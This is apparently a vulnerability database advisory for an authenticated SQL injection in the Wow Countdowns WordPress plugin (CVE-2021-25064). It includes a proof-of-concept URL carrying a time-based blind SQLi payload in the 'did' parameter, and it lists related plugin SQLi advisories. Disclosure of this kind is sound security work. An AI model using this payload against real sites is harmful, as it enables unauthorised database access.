WordPress Plugin Vulnerabilities

Wow Countdowns <= 3.1.2 - Admin+ SQLi

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=mwp-countdown&info=del&did=1+AND+(SELECT+5382+FROM+(SELECT(SLEEP(5)))PpNt)

Affects Plugins

Plugin icon
mwp-countdown
No known fix

References

CVE
CVE-2021-25064

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
0xdecafbad
Submitter website
http://vuln.farm
Verified
Yes
WPVDB ID
30c70315-3c17-41f0-a12f-7e3f793e259c

Timeline

Publicly Published
2022-03-07 (about 1 years ago)
Added
2022-03-07 (about 1 years ago)
Last Updated
2022-04-09 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
WP Forum Server 1.6.5 - feed.php topic Parameter SQL Injection
Published
2018-01-10
Title
Smooth Slider <= 2.8.6 - Authenticated SQL Injection
Published
2023-04-17
Title
Video List Manager <= 1.7 - Admin+ SQL Injection
Published
2023-10-03
Title
MStore API < 4.0.7 - Subscriber+ SQLi
Published
2022-10-31
Title
Event Monster < 1.2.1 - Admin+ SQLi